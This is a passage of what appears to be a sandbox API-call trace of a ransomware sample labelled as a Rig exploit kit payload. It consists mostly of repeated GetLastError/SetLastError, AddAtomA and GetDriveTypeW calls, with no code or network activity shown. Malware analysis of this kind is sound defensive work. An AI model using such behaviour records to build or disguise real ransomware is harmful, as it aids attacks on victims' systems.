cc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x5d\x82\x40\x27\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0085.848] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe")) returned 0x57 [0085.848] GetLastError () returned 0x0 [0085.848] SetLastError (dwErrCode=0x0) [0085.848] GetLastError () returned 0x0 [0085.848] SetLastError (dwErrCode=0x0) [0085.848] GetLastError () returned 0x0 [0085.848] SetLastError (dwErrCode=0x0) [0085.848] GetLastError () returned 0x0 [0085.848] SetLastError (dwErrCode=0x0) [0085.848] GetLastError () returned 0x0 [0085.848] SetLastError (dwErrCode=0x0) [0085.848] GetLastError () returned 0x0 [0085.848] SetLastError (dwErrCode=0x0) [0085.848] GetLastError () returned 0x0 [0085.848] SetLastError (dwErrCode=0x0) [0085.848] GetLastError () returned 0x0 [0085.848] SetLastError (dwErrCode=0x0) [0085.848] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.849] SetLastError (dwErrCode=0x0) [0085.849] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.850] GetLastError () returned 0x0 [0085.850] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.851] GetLastError () returned 0x0 [0085.851] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.852] SetLastError (dwErrCode=0x0) [0085.852] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.853] SetLastError (dwErrCode=0x0) [0085.853] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.854] SetLastError (dwErrCode=0x0) [0085.854] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.855] SetLastError (dwErrCode=0x0) [0085.855] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.856] SetLastError (dwErrCode=0x0) [0085.856] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.857] SetLastError (dwErrCode=0x0) [0085.857] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.858] SetLastError (dwErrCode=0x0) [0085.858] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.859] SetLastError (dwErrCode=0x0) [0085.859] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.860] SetLastError (dwErrCode=0x0) [0085.860] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.861] GetLastError () returned 0x0 [0085.861] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.862] SetLastError (dwErrCode=0x0) [0085.862] GetLastError () returned 0x0 [0085.863] SetLastError (dwErrCode=0x0) [0085.863] GetLastError () returned 0x0 [0085.863] SetLastError (dwErrCode=0x0) [0085.863] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0085.864] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0085.864] GetLastError () returned 0x0 [0085.864] SetLastError (dwErrCode=0x0) [0085.864] GetLastError () returned 0x0 [0085.864] SetLastError (dwErrCode=0x0) [0085.864] GetLastError () returned 0x0 [0085.864] SetLastError (dwErrCode=0x0) [0085.864] GetLastError () returned 0x0 [0085.864] SetLastError (dwErrCode=0x0) [0085.864] GetLastError () returned 0x0 [0085.864] SetLastError (dwErrCode=0x0) [0085.864] GetLastError () returned 0x0 [0085.864] SetLastError (dwErrCode=0x0) [0085.864] GetLastError () returned 0x0 [0085.864] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.865] SetLastError (dwErrCode=0x0) [0085.865] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.866] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.867] SetLastError (dwErrCode=0x0) [0085.867] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.868] SetLastError (dwErrCode=0x0) [0085.868] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.869] GetLastError () returned 0x0 [0085.869] SetLastError (dwErrCode=0x0) [0085.870] LoadLibraryW (lpLibFileName="dfgdfgdfg.exe") returned 0x0 [0085.870] AddAtomA (lpString=0x0) returned 0x0 [0085.870] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.871] AddAtomA (lpString=0x0) returned 0x0 [0085.871] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.876] AddAtomA (lpString=0x0) returned 0x0 [0085.876] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.876] AddAtomA (lpString=0x0) returned 0x0 [0085.876] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.876] AddAtomA (lpString=0x0) returned 0x0 [0085.876] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.876] AddAtomA (lpString=0x0) returned 0x0 [0085.876] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.876] AddAtomA (lpString=0x0) returned 0x0 [0085.876] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.876] AddAtomA (lpString=0x0) returned 0x0 [0085.876] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.876] AddAtomA (lpString=0x0) returned 0x0 [0085.876] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.876] AddAtomA (lpString=0x0) returned 0x0 [0085.876] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.877] AddAtomA (lpString=0x0) returned 0x0 [0085.877] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] 